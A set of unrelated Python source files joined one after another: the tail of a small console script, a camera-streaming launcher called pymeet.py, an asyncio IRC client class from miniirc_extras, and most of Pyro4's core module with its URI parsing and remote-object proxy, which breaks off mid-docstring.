raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
pymeet.py
|
from threading import Thread
import win
from net import connection
import receiver
import sender
import stream_server
def init():
receiver.init(con)
sender.init(con)
if __name__ == "__main__":
con = connection()
Thread(target=init, daemon= False).start()
stream_server.run_cam_server()
# win.init_window()
|
aioirc.py
|
#!/usr/bin/env python3
#
# miniirc_extras.aioirc: asyncio-oriented IRC objects that are mostly
# compatible with existing IRC objects.
#
# Copyright © 2019 by luk3yx.
#
from __future__ import annotations
import atexit, asyncio, functools, miniirc, ssl, threading
from typing import Optional, Union
from . import AbstractIRC as _AbstractIRC
from .utils import dict_to_tags as _dict_to_tags
class _Awaitable:
__slots__ = ('_irc', '_writer')
async def _real_await(self):
await self._writer.drain()
def __await__(self):
if self._irc and self._irc.connected is not None and self._writer:
return self._real_await().__await__()
def __init__(self, irc=None, writer=None):
self._irc = irc
self._writer = writer
class _FakeSocket:
__slots__ = ('_irc',)
def settimeout(self, timeout: int) -> None:
self._irc.timeout = int(timeout)
def __init__(self, irc) -> None:
self._irc = irc
class AsyncIRC(miniirc.IRC):
"""
An asyncio-based miniirc-compatible IRC class.
"""
_pinged: bool = False
_event_loop = None
__awaitable = _Awaitable()
def main(self):
raise NotImplementedError
def _main(self):
raise NotImplementedError
# Run a coroutine and disregard its return value.
def _run(self, coro):
loop = self._event_loop
loop.call_soon_threadsafe(functools.partial(asyncio.ensure_future,
coro, loop=loop))
# A replaced irc.quote()
def quote(self, *msg: str, force: Optional[bool] = None, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
"""
Sends a raw message to IRC, use force=True to send while disconnected.
Do not send multiple commands in one irc.quote(), as the newlines will
be stripped and it will be sent as one command. The `tags` parameter
optionally allows you to add a dict with IRCv3 message tags, and will
not be sent to IRC servers that do not support message tags.
"""
if not tags and msg and isinstance(msg[0], dict):
tags = msg[0]
msg = msg[1:]
if self.connected or force:
self.debug('>3> ' + str(tags) if tags else '>>>', *msg)
self._run(self._raw_quote(tags, ' '.join(msg), force))
else:
self.debug('>Q>', *msg)
# TODO: Fix this
if hasattr(self, 'sendq'):
if self.sendq: # type: ignore
sendq = self.sendq # type: ignore
else:
sendq = []
self.sendq = sendq # type: ignore
elif self._sendq: # type: ignore
sendq = self._sendq = [] # type: ignore
else:
sendq = []
self._sendq = sendq = [] # type: ignore
if isinstance(tags, dict):
msg = (tags,) + msg # type: ignore
sendq.append(msg)
return self.__awaitable
def msg(self, target: str, *msg: str, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
return self.quote('PRIVMSG', str(target), ':' + ' '.join(msg),
tags=tags)
def notice(self, target: str, *msg: str, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
return self.quote('NOTICE', str(target), ':' + ' '.join(msg),
tags=tags)
def ctcp(self, target: str, *msg: str, reply: bool = False, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
m = (self.notice if reply else self.msg)
return m(target, '\x01{}\x01'.format(' '.join(msg)), tags=tags)
def me(self, target: str, *msg: str, # type: ignore
tags: Optional[dict[str, Union[str, bool]]] = None) -> _Awaitable:
return self.ctcp(target, 'ACTION', *msg, tags=tags)
# Actually send messages
async def _raw_quote(self, tags: Optional[dict[str, Union[str, bool]]],
msg: str, force: Optional[bool]) -> None:
# Oops, the connection was lost before this function got called.
if self.connected is None:
if not force:
self.quote(msg, tags=tags)
return
# Encode the message
msg = msg.replace('\r', ' ').replace('\n', ' ')
rawmsg = msg.encode('utf-8')[:self.msglen - 2] + b'\r\n'
if isinstance(tags, dict) \
and ('message-tags' in self.active_caps
or 'draft/message-tags-0.2' in self.active_caps):
rawmsg = _dict_to_tags(tags) + rawmsg
# Send the message
self.__writer.write(rawmsg)
def _start_handler(self, handlers, command, hostmask, tags, args):
r = False
for handler in handlers:
r = True
params = [self, hostmask, list(args)]
if not hasattr(handler, 'miniirc_colon') and args and \
args[-1].startswith(':'):
params[2][-1] = args[-1][1:]
if hasattr(handler, 'miniirc_ircv3'):
params.insert(2, dict(tags))
if hasattr(handler, 'miniirc_cmd_arg'):
params.insert(1, command)
if hasattr(handler, 'miniirc_coroutinefunc'):
self._run(handler(*params))
else:
threading.Thread(target=handler, args=params).start()
return r
def Handler(self, *args, **kwargs):
real_add_handler = super().Handler(*args, **kwargs)
def add_handler(func):
if asyncio.iscoroutinefunction(func):
getattr(func, '__func__', func).miniirc_coroutinefunc = True
return real_add_handler(func)
return add_handler
def CmdHandler(self, *args, **kwargs):
real_add_handler = super().CmdHandler(*args, **kwargs)
def add_handler(func):
if asyncio.iscoroutinefunction(func):
getattr(func, '__func__', func).miniirc_coroutinefunc = True
return real_add_handler(func)
return add_handler
# The same as miniirc's _main() but async.
# This could use readuntil() or readline(), however by reading lines
# "manually" compatibility with weird \r-only IRC servers is maintained.
async def __main(self) -> None:
reader = self.__reader
self.debug('Main loop running!')
buffer: bytes = b''
while True:
try:
assert len(buffer) < 65535, 'Very long line detected!'
try:
raw = await asyncio.wait_for(reader.read(8192),
self.ping_interval)
assert raw
buffer += raw.replace(b'\r', b'\n')
except asyncio.TimeoutError:
if self._pinged:
raise
else:
self._pinged = True
self.quote('PING', ':miniirc-ping', force=True)
except Exception as e:
self.debug('Lost connection!', repr(e))
self.disconnect(auto_reconnect=True)
while self.persist:
await asyncio.sleep(5)
self.debug('Reconnecting...')
try:
await self.async_connect()
except:
self.debug('Failed to reconnect!')
self.connected = None
else:
return
return
raw = buffer.split(b'\n') # type: ignore
buffer = raw.pop() # type: ignore
for line in raw:
line = line.decode('utf-8', 'replace') # type: ignore
if line:
self.debug('<<<', line)
try:
result = self._parse(line) # type: ignore
except:
result = None
if isinstance(result, tuple) and len(result) == 4:
self._handle(*result)
else:
self.debug('Ignored message:', line)
del raw
async def async_connect(self) -> None:
""" Connects to the IRC server if not already connected. """
if self.connected is not None:
self.debug('Already connected!')
return
if self._event_loop is None:
self._event_loop = asyncio.get_event_loop()
self.connected = False
self.debug('Connecting to', self.ip, 'port', self.port)
self.sock = _FakeSocket(self)
# Create an SSL context
ctx: Optional[ssl.SSLContext] = None
if self.ssl:
if self.verify_ssl:
ctx = ssl.create_default_context(cafile=miniirc.get_ca_certs())
ctx.verify_mode = ssl.CERT_REQUIRED
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Get the stream reader and writer.
self.__reader, self.__writer = \
await asyncio.open_connection(self.ip, self.port, ssl=ctx)
self.__awaitable = _Awaitable(self, self.__writer)
# TODO: Something other than this.
self._unhandled_caps = None
self.quote('CAP LS 302', force=True)
self.quote('USER', self.ident, '0', '*', ':' + self.realname,
force=True)
self.quote('NICK', self.nick, force=True)
atexit.register(self.disconnect)
self.debug('Starting main loop...')
self._sasl = self._pinged = False
# Call main()
asyncio.ensure_future(self.__main())
def connect(self) -> None:
"""
Connects to the IRC server if not already connected.
If you are calling this from a coroutine you should use `async_connect`
instead.
"""
if self._event_loop is None:
self._event_loop = asyncio.get_event_loop()
self._run(self.async_connect())
def _update_docstrings():
for k in dir(AsyncIRC):
f, f2 = getattr(AsyncIRC, k), getattr(_AbstractIRC, k, None)
if f is not f2 and callable(f) and f.__doc__ is None and \
f2.__doc__ is not None:
f.__doc__ = f2.__doc__
_update_docstrings()
del _update_docstrings
|
core.py
|
"""
Core logic (uri, daemon, proxy stuff).
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
from __future__ import print_function, division
import inspect
import re
import logging
import sys
import ssl
import os
import time
import threading
import uuid
import base64
import warnings
import socket
import random
from Pyro4 import errors, socketutil, util, constants, message, futures
from Pyro4.configuration import config
__all__ = ["URI", "Proxy", "Daemon", "current_context", "callback", "batch", "asyncproxy", "expose", "behavior",
"oneway", "SerializedBlob", "_resolve", "_locateNS"]
if sys.version_info >= (3, 0):
basestring = str
log = logging.getLogger("Pyro4.core")
class URI(object):
"""
Pyro object URI (universal resource identifier).
The uri format is like this: ``PYRO:objectid@location`` where location is one of:
- ``hostname:port`` (tcp/ip socket on given port)
- ``./u:sockname`` (Unix domain socket on localhost)
There is also a 'Magic format' for simple name resolution using Name server:
``PYRONAME:objectname[@location]`` (optional name server location, can also omit location port)
And one that looks up things in the name server by metadata:
``PYROMETA:meta1,meta2,...[@location]`` (optional name server location, can also omit location port)
You can write the protocol in lowercase if you like (``pyro:...``) but it will
automatically be converted to uppercase internally.
"""
uriRegEx = re.compile(r"(?P<protocol>[Pp][Yy][Rr][Oo][a-zA-Z]*):(?P<object>\S+?)(@(?P<location>.+))?$")
def __init__(self, uri):
if isinstance(uri, URI):
state = uri.__getstate__()
self.__setstate__(state)
return
if not isinstance(uri, basestring):
raise TypeError("uri parameter object is of wrong type")
self.sockname = self.host = self.port = None
match = self.uriRegEx.match(uri)
if not match:
raise errors.PyroError("invalid uri")
self.protocol = match.group("protocol").upper()
self.object = match.group("object")
location = match.group("location")
if self.protocol == "PYRONAME":
self._parseLocation(location, config.NS_PORT)
elif self.protocol == "PYRO":
if not location:
raise errors.PyroError("invalid uri")
self._parseLocation(location, None)
elif self.protocol == "PYROMETA":
self.object = set(m.strip() for m in self.object.split(","))
self._parseLocation(location, config.NS_PORT)
else:
raise errors.PyroError("invalid uri (protocol)")
def _parseLocation(self, location, defaultPort):
if not location:
return
if location.startswith("./u:"):
self.sockname = location[4:]
if (not self.sockname) or ':' in self.sockname:
raise errors.PyroError("invalid uri (location)")
else:
if location.startswith("["): # ipv6
if location.startswith("[["): # possible mistake: double-bracketing
raise errors.PyroError("invalid ipv6 address: enclosed in too many brackets")
ipv6locationmatch = re.match(r"\[([0-9a-fA-F:%]+)](:(\d+))?", location)
if not ipv6locationmatch:
raise errors.PyroError("invalid ipv6 address: the part between brackets must be a numeric ipv6 address")
self.host, _, self.port = ipv6locationmatch.groups()
else:
self.host, _, self.port = location.partition(":")
if not self.port:
self.port = defaultPort
try:
self.port = int(self.port)
except (ValueError, TypeError):
raise errors.PyroError("invalid port in uri, port=" + str(self.port))
@staticmethod
def isUnixsockLocation(location):
"""determine if a location string is for a Unix domain socket"""
return location.startswith("./u:")
@property
def location(self):
"""property containing the location string, for instance ``"servername.you.com:5555"``"""
if self.host:
if ":" in self.host: # ipv6
return "[%s]:%d" % (self.host, self.port)
else:
return "%s:%d" % (self.host, self.port)
elif self.sockname:
return "./u:" + self.sockname
else:
return None
def asString(self):
"""the string representation of this object"""
if self.protocol == "PYROMETA":
result = "PYROMETA:" + ",".join(self.object)
else:
result = self.protocol + ":" + self.object
location = self.location
if location:
result += "@" + location
return result
def __str__(self):
string = self.asString()
if sys.version_info < (3, 0) and type(string) is unicode:
return string.encode("ascii", "replace")
return string
def __unicode__(self):
return self.asString()
def __repr__(self):
return "<%s.%s at 0x%x; %s>" % (self.__class__.__module__, self.__class__.__name__, id(self), str(self))
def __eq__(self, other):
if not isinstance(other, URI):
return False
return (self.protocol, self.object, self.sockname, self.host, self.port) ==\
(other.protocol, other.object, other.sockname, other.host, other.port)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.protocol, str(self.object), self.sockname, self.host, self.port))
# note: getstate/setstate are not needed if we use pickle protocol 2,
# but this way it helps pickle to make the representation smaller by omitting all attribute names.
def __getstate__(self):
return self.protocol, self.object, self.sockname, self.host, self.port
def __setstate__(self, state):
self.protocol, self.object, self.sockname, self.host, self.port = state
def __getstate_for_dict__(self):
return self.__getstate__()
def __setstate_from_dict__(self, state):
self.__setstate__(state)
class _RemoteMethod(object):
"""method call abstraction"""
def __init__(self, send, name, max_retries):
self.__send = send
self.__name = name
self.__max_retries = max_retries
def __getattr__(self, name):
return _RemoteMethod(self.__send, "%s.%s" % (self.__name, name), self.__max_retries)
def __call__(self, *args, **kwargs):
for attempt in range(self.__max_retries + 1):
try:
return self.__send(self.__name, args, kwargs)
except (errors.ConnectionClosedError, errors.TimeoutError):
# only retry for recoverable network errors
if attempt >= self.__max_retries:
# last attempt, raise the exception
raise
class Proxy(object):
"""
Pyro proxy for a remote object. Intercepts method calls and dispatches them to the remote object.
.. automethod:: _pyroBind
.. automethod:: _pyroRelease
.. automethod:: _pyroReconnect
.. automethod:: _pyroBatch
.. automethod:: _pyroAsync
.. automethod:: _pyroAnnotations
.. automethod:: _pyroResponseAnnotations
.. automethod:: _pyroValidateHandshake
.. autoattribute:: _pyroTimeout
.. autoattribute:: _pyroHmacKey
.. attribute:: _pyroMaxRetries
Number of retries to perform on communication calls by this proxy, allows you to override the default setting.
.. attribute:: _pyroSerializer
Name of the serializer to use by this proxy, allows you to override the default setting.
.. attribute:: _pyroHandshake
The data object that should be sent in the initial connection handshake message. Can be any serializable object.
"""
__pyroAttributes = frozenset(
["__getnewargs__", "__getnewargs_ex__", "__getinitargs__", "_pyroConnection", "_pyroUri",
"_pyroOneway", "_pyroMethods", "_pyroAttrs", "_pyroTimeout", "_pyroSeq", "_pyroHmacKey",
"_pyroRawWireResponse", "_pyroHandshake", "_pyroMaxRetries", "_pyroSerializer", "_Proxy__async",
"_Proxy__pyroHmacKey", "_Proxy__pyroTimeout", "_Proxy__pyroConnLock"])
def __init__(self, uri, connected_socket=None):
if connected_socket:
uri = URI("PYRO:" + uri + "@<<connected-socket>>:0")
if isinstance(uri, basestring):
uri = URI(uri)
elif not isinstance(uri, URI):
raise TypeError("expected Pyro URI")
self._pyroUri = uri
self._pyroConnection = None
self._pyroSerializer = None # can be set to the name of a serializer to override the global one per-proxy
self._pyroMethods = set() # all methods of the remote object, gotten from meta-data
self._pyroAttrs = set() # attributes of the remote object, gotten from meta-data
self._pyroOneway = set() # oneway-methods of the remote object, gotten from meta-data
self._pyroSeq = 0 # message sequence number
self._pyroRawWireResponse = False # internal switch to enable wire level responses
self._pyroHandshake = "hello" # the data object that should be sent in the initial connection handshake message
self._pyroMaxRetries = config.MAX_RETRIES
self.__pyroHmacKey = None
self.__pyroTimeout = config.COMMTIMEOUT
self.__pyroConnLock = threading.RLock()
util.get_serializer(config.SERIALIZER) # assert that the configured serializer is available
self.__async = False
current_context.annotations = {}
current_context.response_annotations = {}
if connected_socket:
self.__pyroCreateConnection(False, connected_socket)
@property
def _pyroHmacKey(self):
"""the HMAC key (bytes) that this proxy uses"""
return self.__pyroHmacKey
@_pyroHmacKey.setter
def _pyroHmacKey(self, value):
# if needed, convert the hmac value to bytes first
if value and sys.version_info >= (3, 0) and type(value) is not bytes:
value = value.encode("utf-8") # convert to bytes
self.__pyroHmacKey = value
def __del__(self):
if hasattr(self, "_pyroConnection"):
self._pyroRelease()
def __getattr__(self, name):
if name in Proxy.__pyroAttributes:
# allows it to be safely pickled
raise AttributeError(name)
if config.METADATA:
# get metadata if it's not there yet
if not self._pyroMethods and not self._pyroAttrs:
self._pyroGetMetadata()
if name in self._pyroAttrs:
return self._pyroInvoke("__getattr__", (name,), None)
if config.METADATA and name not in self._pyroMethods:
# client side check if the requested attr actually exists
raise AttributeError("remote object '%s' has no exposed attribute or method '%s'" % (self._pyroUri, name))
if self.__async:
return _AsyncRemoteMethod(self, name, self._pyroMaxRetries)
return _RemoteMethod(self._pyroInvoke, name, self._pyroMaxRetries)
def __setattr__(self, name, value):
if name in Proxy.__pyroAttributes:
return super(Proxy, self).__setattr__(name, value) # one of the special pyro attributes
if config.METADATA:
# get metadata if it's not there yet
if not self._pyroMethods and not self._pyroAttrs:
self._pyroGetMetadata()
if name in self._pyroAttrs:
return self._pyroInvoke("__setattr__", (name, value), None) # remote attribute
if config.METADATA:
# client side validation if the requested attr actually exists
raise AttributeError("remote object '%s' has no exposed attribute '%s'" % (self._pyroUri, name))
# metadata disabled, just treat it as a local attribute on the proxy:
return super(Proxy, self).__setattr__(name, value)
def __repr__(self):
if self._pyroConnection:
connected = "connected " + self._pyroConnection.family()
else:
connected = "not connected"
return "<%s.%s at 0x%x; %s; for %s>" % (self.__class__.__module__, self.__class__.__name__,
id(self), connected, self._pyroUri)
def __unicode__(self):
return str(self)
def __getstate_for_dict__(self):
encodedHmac = None
if self._pyroHmacKey is not None:
encodedHmac = "b64:" + (base64.b64encode(self._pyroHmacKey).decode("ascii"))
# for backwards compatibility reasons we also put the timeout and maxretries into the state
return self._pyroUri.asString(), tuple(self._pyroOneway), tuple(self._pyroMethods), tuple(self._pyroAttrs),\
self.__pyroTimeout, encodedHmac, self._pyroHandshake, self._pyroMaxRetries, self._pyroSerializer
def __setstate_from_dict__(self, state):
uri = URI(state[0])
oneway = set(state[1])
methods = set(state[2])
attrs = set(state[3])
timeout = state[4]
hmac_key = state[5]
handshake = state[6]
max_retries = state[7]
serializer = None if len(state) < 9 else state[8]
if hmac_key:
if hmac_key.startswith("b64:"):
hmac_key = base64.b64decode(hmac_key[4:].encode("ascii"))
else:
raise errors.ProtocolError("hmac encoding error")
self.__setstate__((uri, oneway, methods, attrs, timeout, hmac_key, handshake, max_retries, serializer))
def __getstate__(self):
# for backwards compatibility reasons we also put the timeout and maxretries into the state
return self._pyroUri, self._pyroOneway, self._pyroMethods, self._pyroAttrs, self.__pyroTimeout, \
self._pyroHmacKey, self._pyroHandshake, self._pyroMaxRetries, self._pyroSerializer
def __setstate__(self, state):
# Note that the timeout and maxretries are also part of the state (for backwards compatibility reasons),
# but we're not using them here. Instead we get the configured values from the 'local' config.
self._pyroUri, self._pyroOneway, self._pyroMethods, self._pyroAttrs, _, self._pyroHmacKey, self._pyroHandshake = state[:7]
self._pyroSerializer = None if len(state) < 9 else state[8]
self.__pyroTimeout = config.COMMTIMEOUT
self._pyroMaxRetries = config.MAX_RETRIES
self._pyroConnection = None
self._pyroSeq = 0
self._pyroRawWireResponse = False
self.__pyroConnLock = threading.RLock()
self.__async = False
def __copy__(self):
uriCopy = URI(self._pyroUri)
p = type(self)(uriCopy)
p._pyroOneway = set(self._pyroOneway)
p._pyroMethods = set(self._pyroMethods)
p._pyroAttrs = set(self._pyroAttrs)
p._pyroSerializer = self._pyroSerializer
p._pyroTimeout = self._pyroTimeout
p._pyroHandshake = self._pyroHandshake
p._pyroHmacKey = self._pyroHmacKey
p._pyroRawWireResponse = self._pyroRawWireResponse
p._pyroMaxRetries = self._pyroMaxRetries
p.__async = self.__async
return p
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self._pyroRelease()
def __eq__(self, other):
if other is self:
return True
return isinstance(other, Proxy) and other._pyroUri == self._pyroUri
def __ne__(self, other):
if other and isinstance(other, Proxy):
return other._pyroUri != self._pyroUri
return True
def __hash__(self):
return hash(self._pyroUri)
def __dir__(self):
result = dir(self.__class__) + list(self.__dict__.keys())
return sorted(set(result) | self._pyroMethods | self._pyroAttrs)
def _pyroRelease(self):
"""release the connection to the pyro daemon"""
with self.__pyroConnLock:
if self._pyroConnection is not None:
if self._pyroConnection.keep_open:
return
self._pyroConnection.close()
self._pyroConnection = None
log.debug("connection released")
def _pyroBind(self):
"""
Bind this proxy to the exact object from the uri. That means that the proxy's uri
will be updated with a direct PYRO uri, if it isn't one yet.
If the proxy is already bound, it will not bind again.
"""
return self.__pyroCreateConnection(True)
def __pyroGetTimeout(self):
return self.__pyroTimeout
def __pyroSetTimeout(self, timeout):
self.__pyroTimeout = timeout
if self._pyroConnection is not None:
self._pyroConnection.timeout = timeout
_pyroTimeout = property(__pyroGetTimeout, __pyroSetTimeout, doc="""
The timeout in seconds for calls on this proxy. Defaults to ``None``.
If the timeout expires before the remote method call returns,
Pyro will raise a :exc:`Pyro4.errors.TimeoutError`""")
def _pyroInvoke(self, methodname, vargs, kwargs, flags=0, objectId=None):
"""perform the remote method call communication"""
current_context.response_annotations = {}
with self.__pyroConnLock:
if self._pyroConnection is None:
self.__pyroCreateConnection()
serializer = util.get_serializer(self._pyroSerializer or config.SERIALIZER)
objectId = objectId or self._pyroConnection.objectId
annotations = self.__annotations()
if vargs and isinstance(vargs[0], SerializedBlob):
# special serialization of a 'blob' that stays serialized
data, compressed, flags = self.__serializeBlobArgs(vargs, kwargs, annotations, flags, objectId, methodname, serializer)
else:
# normal serialization of the remote call
data, compressed = serializer.serializeCall(objectId, methodname, vargs, kwargs, compress=config.COMPRESSION)
if compressed:
flags |= message.FLAGS_COMPRESSED
if methodname in self._pyroOneway:
flags |= message.FLAGS_ONEWAY
self._pyroSeq = (self._pyroSeq + 1) & 0xffff
msg = message.Message(message.MSG_INVOKE, data, serializer.serializer_id, flags, self._pyroSeq,
annotations=annotations, hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy wiredata sending", msg)
try:
self._pyroConnection.send(msg.to_bytes())
del msg # invite GC to collect the object, don't wait for out-of-scope
if flags & message.FLAGS_ONEWAY:
return None # oneway call, no response data
else:
msg = message.Message.recv(self._pyroConnection, [message.MSG_RESULT], hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy wiredata received", msg)
self.__pyroCheckSequence(msg.seq)
if msg.serializer_id != serializer.serializer_id:
error = "invalid serializer in response: %d" % msg.serializer_id
log.error(error)
raise errors.SerializeError(error)
if msg.annotations:
current_context.response_annotations = msg.annotations
self._pyroResponseAnnotations(msg.annotations, msg.type)
if self._pyroRawWireResponse:
msg.decompress_if_needed()
return msg
data = serializer.deserializeData(msg.data, compressed=msg.flags & message.FLAGS_COMPRESSED)
if msg.flags & message.FLAGS_ITEMSTREAMRESULT:
streamId = bytes(msg.annotations.get("STRM", b"")).decode()
if not streamId:
raise errors.ProtocolError("result of call is an iterator, but the server is not configured to allow streaming")
return _StreamResultIterator(streamId, self)
if msg.flags & message.FLAGS_EXCEPTION:
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(data, False)
raise data # if you see this in your traceback, you should probably inspect the remote traceback as well
else:
return data
except (errors.CommunicationError, KeyboardInterrupt):
# Communication error during read. To avoid corrupt transfers, we close the connection.
# Otherwise we might receive the previous reply as a result of a new method call!
# Special case for keyboardinterrupt: people pressing ^C to abort the client
# may be catching the keyboardinterrupt in their code. We should probably be on the
# safe side and release the proxy connection in this case too, because they might
# be reusing the proxy object after catching the exception...
self._pyroRelease()
raise
def __pyroCheckSequence(self, seq):
if seq != self._pyroSeq:
err = "invoke: reply sequence out of sync, got %d expected %d" % (seq, self._pyroSeq)
log.error(err)
raise errors.ProtocolError(err)
def __pyroCreateConnection(self, replaceUri=False, connected_socket=None):
"""
Connects this proxy to the remote Pyro daemon. Does connection handshake.
Returns true if a new connection was made, false if an existing one was already present.
"""
def connect_and_handshake(conn):
try:
if self._pyroConnection is not None:
return False # already connected
if config.SSL:
sslContext = socketutil.getSSLcontext(clientcert=config.SSL_CLIENTCERT,
clientkey=config.SSL_CLIENTKEY,
keypassword=config.SSL_CLIENTKEYPASSWD,
cacerts=config.SSL_CACERTS)
else:
sslContext = None
sock = socketutil.createSocket(connect=connect_location,
reuseaddr=config.SOCK_REUSE,
timeout=self.__pyroTimeout,
nodelay=config.SOCK_NODELAY,
sslContext=sslContext)
conn = socketutil.SocketConnection(sock, uri.object)
# Do handshake.
serializer = util.get_serializer(self._pyroSerializer or config.SERIALIZER)
data = {"handshake": self._pyroHandshake}
if config.METADATA:
# the object id is only used/needed when piggybacking the metadata on the connection response
# make sure to pass the resolved object id instead of the logical id
data["object"] = uri.object
flags = message.FLAGS_META_ON_CONNECT
else:
flags = 0
data, compressed = serializer.serializeData(data, config.COMPRESSION)
if compressed:
flags |= message.FLAGS_COMPRESSED
msg = message.Message(message.MSG_CONNECT, data, serializer.serializer_id, flags, self._pyroSeq,
annotations=self.__annotations(False), hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy connect sending", msg)
conn.send(msg.to_bytes())
msg = message.Message.recv(conn, [message.MSG_CONNECTOK, message.MSG_CONNECTFAIL], hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "proxy connect response received", msg)
except Exception as x:
if conn:
conn.close()
err = "cannot connect to %s: %s" % (connect_location, x)
log.error(err)
if isinstance(x, errors.CommunicationError):
raise
else:
ce = errors.CommunicationError(err)
if sys.version_info >= (3, 0):
ce.__cause__ = x
raise ce
else:
handshake_response = "?"
if msg.data:
serializer = util.get_serializer_by_id(msg.serializer_id)
handshake_response = serializer.deserializeData(msg.data, compressed=msg.flags & message.FLAGS_COMPRESSED)
if msg.type == message.MSG_CONNECTFAIL:
if sys.version_info < (3, 0):
error = "connection to %s rejected: %s" % (connect_location, handshake_response.decode())
else:
error = "connection to %s rejected: %s" % (connect_location, handshake_response)
conn.close()
log.error(error)
raise errors.CommunicationError(error)
elif msg.type == message.MSG_CONNECTOK:
if msg.flags & message.FLAGS_META_ON_CONNECT:
self.__processMetadata(handshake_response["meta"])
handshake_response = handshake_response["handshake"]
self._pyroConnection = conn
if replaceUri:
self._pyroUri = uri
self._pyroValidateHandshake(handshake_response)
log.debug("connected to %s - %s - %s", self._pyroUri, conn.family(), "SSL" if sslContext else "unencrypted")
if msg.annotations:
self._pyroResponseAnnotations(msg.annotations, msg.type)
else:
conn.close()
err = "cannot connect to %s: invalid msg type %d received" % (connect_location, msg.type)
log.error(err)
raise errors.ProtocolError(err)
with self.__pyroConnLock:
if self._pyroConnection is not None:
return False # already connected
if connected_socket:
if config.SSL and not isinstance(connected_socket, ssl.SSLSocket):
raise socket.error("SSL configured for Pyro but existing socket is not a SSL socket")
uri = self._pyroUri
else:
uri = _resolve(self._pyroUri, self._pyroHmacKey)
# socket connection (normal or Unix domain socket)
conn = None
log.debug("connecting to %s", uri)
connect_location = uri.sockname or (uri.host, uri.port)
if connected_socket:
self._pyroConnection = socketutil.SocketConnection(connected_socket, uri.object, True)
else:
connect_and_handshake(conn)
if config.METADATA:
# obtain metadata if this feature is enabled, and the metadata is not known yet
if self._pyroMethods or self._pyroAttrs:
log.debug("reusing existing metadata")
else:
self._pyroGetMetadata(uri.object)
return True
def _pyroGetMetadata(self, objectId=None, known_metadata=None):
"""
Get metadata from server (methods, attrs, oneway, ...) and remember them in some attributes of the proxy.
Usually this will already be known due to the default behavior of the connect handshake, where the
connect response also includes the metadata.
"""
objectId = objectId or self._pyroUri.object
log.debug("getting metadata for object %s", objectId)
if self._pyroConnection is None and not known_metadata:
try:
self.__pyroCreateConnection()
except errors.PyroError:
log.error("problem getting metadata: cannot connect")
raise
if self._pyroMethods or self._pyroAttrs:
return # metadata has already been retrieved as part of creating the connection
try:
# invoke the get_metadata method on the daemon
result = known_metadata or self._pyroInvoke("get_metadata", [objectId], {}, objectId=constants.DAEMON_NAME)
self.__processMetadata(result)
except errors.PyroError:
log.exception("problem getting metadata")
raise
def __processMetadata(self, metadata):
if not metadata:
return
self._pyroOneway = set(metadata["oneway"])
self._pyroMethods = set(metadata["methods"])
self._pyroAttrs = set(metadata["attrs"])
if log.isEnabledFor(logging.DEBUG):
log.debug("from meta: methods=%s, oneway methods=%s, attributes=%s",
sorted(self._pyroMethods), sorted(self._pyroOneway), sorted(self._pyroAttrs))
if not self._pyroMethods and not self._pyroAttrs:
raise errors.PyroError("remote object doesn't expose any methods or attributes. Did you forget setting @expose on them?")
def _pyroReconnect(self, tries=100000000):
"""
(Re)connect the proxy to the daemon containing the pyro object which the proxy is for.
In contrast to the _pyroBind method, this one first releases the connection (if the proxy is still connected)
and retries making a new connection until it succeeds or the given amount of tries ran out.
"""
self._pyroRelease()
while tries:
try:
self.__pyroCreateConnection()
return
except errors.CommunicationError:
tries -= 1
if tries:
time.sleep(2)
msg = "failed to reconnect"
log.error(msg)
raise errors.ConnectionClosedError(msg)
def _pyroBatch(self):
"""returns a helper class that lets you create batched method calls on the proxy"""
return _BatchProxyAdapter(self)
def _pyroAsync(self, asynchronous=True):
"""turns the proxy into asynchronous mode so you can do asynchronous method calls,
or sets it back to normal sync mode if you set asynchronous=False.
This setting is strictly on a per-proxy basis (unless an exact clone is made
via copy.copy)."""
self.__async = asynchronous
if sys.version_info < (3, 7):
# async keyword backwards compatibility
_pyroAsync_37 = _pyroAsync
def _pyroAsync(self, asynchronous=True, **kwargs):
if kwargs:
kword = list(kwargs.keys())
if kword != ["async"]:
raise TypeError("_pyroAsync() got an unexpected keyword argument '{:s}'".format(kword[0]))
asynchronous = kwargs["async"]
return Proxy._pyroAsync_37(self, asynchronous)
def _pyroInvokeBatch(self, calls, oneway=False):
flags = message.FLAGS_BATCH
if oneway:
flags |= message.FLAGS_ONEWAY
return self._pyroInvoke("<batch>", calls, None, flags)
def _pyroAnnotations(self):
"""
Override to return a dict with custom user annotations to be sent with each request message.
Code using Pyro 4.56 or newer can skip this and instead set the annotations directly on the context object.
"""
return {}
def _pyroResponseAnnotations(self, annotations, msgtype):
"""
Process any response annotations (dictionary set by the daemon).
Usually this contains the internal Pyro annotations such as hmac and correlation id,
and if you override the annotations method in the daemon, can contain your own annotations as well.
Code using Pyro 4.56 or newer can skip this and instead read the response_annotations directly from the context object.
"""
pass
def _pyroValidateHandshake(self, response):
"""
Process and validate the initial connection handshake response data received from the daemon.
Simply return without error if everything is ok.
Raise an exception if something is wrong and the connection should not be made.
"""
return
def __annotations(self, clear=True):
annotations = current_context.annotations
if current_context.correlation_id:
annotations["CORR"] = current_context.correlation_id.bytes
else:
annotations.pop("CORR", None)
annotations.update(self._pyroAnnotations())
if clear:
current_context.annotations = {}
return annotations
def __serializeBlobArgs(self, vargs, kwargs, annotations, flags, objectId, methodname, serializer):
"""
Special handling of a "blob" argument that has to stay serialized until explicitly deserialized in client code.
This makes efficient, transparent gateways or dispatchers and such possible:
they don't have to de/reserialize the message and are independent from the serialized class definitions.
